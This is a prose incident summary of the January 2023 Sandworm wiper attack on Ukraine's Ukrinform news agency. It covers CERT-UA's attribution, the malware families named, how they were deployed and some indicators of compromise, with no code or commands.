Cyber Incident Victim: Ukrinform

On January 17, 2023, the Ukrainian national news agency Ukrinform experienced a cyberattack during a scheduled press briefing hosted by Yurii Shchyhol, head of Ukraine’s State Service of Special Communications and Information Protection (SSSCIP). The attack disrupted internet connectivity, forcing a 15-minute interruption of all online broadcasts from the Media Center. Ukrainian investigators, including the Computer Emergency Response Team (CERT-UA) and SSSCIP, attributed the incident to the Russian state-sponsored threat group UAC-0082, widely known as Sandworm, which has documented ties to the GRU, Russia’s military intelligence agency. The attackers deployed five distinct malware variants—CaddyWiper, ZeroWipe, SDelete, AwfulShred, and BidSwipe—targeting Windows, Linux, and FreeBSD systems to corrupt data integrity and availability. Sandworm used a Group Policy Object (GPO) to centrally distribute malware via scheduled tasks, indicating prior network compromise. The Russian-aligned Telegram channel "CyberArmyofRussia_Reborn" claimed responsibility for the attack minutes after the disruption began, a channel CERT-UA noted had exclusively promoted Sandworm’s destructive operations alongside routine DDoS and defacement claims. The attack coincided with Shchyhol’s planned discussion of Russia’s hybrid warfare tactics, including cyberattacks preceding missile strikes on critical infrastructure. While the malware execution partially succeeded, affecting several data storage systems, SSSCIP technicians restored connectivity swiftly, allowing the briefing to resume. Shchyhol publicly dismissed the attack’s impact, stating it merely delayed the event and symbolically foreshadowed Russia’s eventual defeat.

CERT-UA’s investigation, initiated on the day of the attack, revealed Sandworm had conducted reconnaissance on Ukrinform’s systems no later than December 7, 2022, establishing footholds for the January 17 operation. Forensic analysis identified malicious scripts and binaries, including CaddyWiper v3, ZeroWipe, and the repurposed Microsoft utility SDelete, executed via a batch file ("news.bat"). Linux-based AwfulShred and FreeBSD-targeting BidSwipe demonstrated cross-platform targeting. Attackers attempted to overwrite files with null bytes or random data before deletion but failed to disrupt most user workstations. Compromise indicators included anomalous processes (e.g., dnscmd, certutil), scheduled tasks (e.g., Windows_Security_Update_HxW), and files like C:\Users\new.exe. Network artifacts linked the attack to TOR exit nodes in Germany, the Netherlands, France, and Ukraine, hosted by providers such as Digitalcourage and Stark Industries. CERT-UA localized the threat by identifying the compromised infrastructure component enabling unauthorized remote access, limiting data loss. The agency confirmed Sandworm’s involvement through tactical overlaps, including GPO abuse and wiper deployment patterns consistent with prior campaigns like Industroyer2. Despite partial data destruction, Ukrinform’s operations continued uninterrupted post-recovery, underscoring the attack’s limited operational impact relative to its symbolic timing during a high-profile government briefing.